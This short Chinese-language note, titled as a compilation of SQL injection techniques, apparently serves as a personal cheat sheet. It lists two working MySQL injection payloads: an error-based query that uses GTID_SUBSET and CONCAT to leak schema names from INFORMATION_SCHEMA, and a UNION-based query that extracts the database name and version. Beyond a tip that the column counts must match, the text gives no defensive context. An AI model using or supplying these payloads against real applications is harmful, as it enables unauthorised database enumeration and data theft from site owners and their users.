sql注入整合

Mysql注入

1. 通过报错 来爆出库信息
   SELECT * FROM test WHERE id = 'dddI /**/' AND GTID_SUBSET ( CONCAT( 0x43646158, ( SELECT MID( IFNULL( CAST( schema_name AS NCHAR ), 0x20 ), 1, 145 ) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6, 1 ), 0x66587655 ), 6420 )
2. 通过union获取信息 需要注意 列必须对的上
   SELECT id,id,id FROM tp_vote_user WHERE id = 'dddIA6RBJ1E /**/' union select 1,database(),version()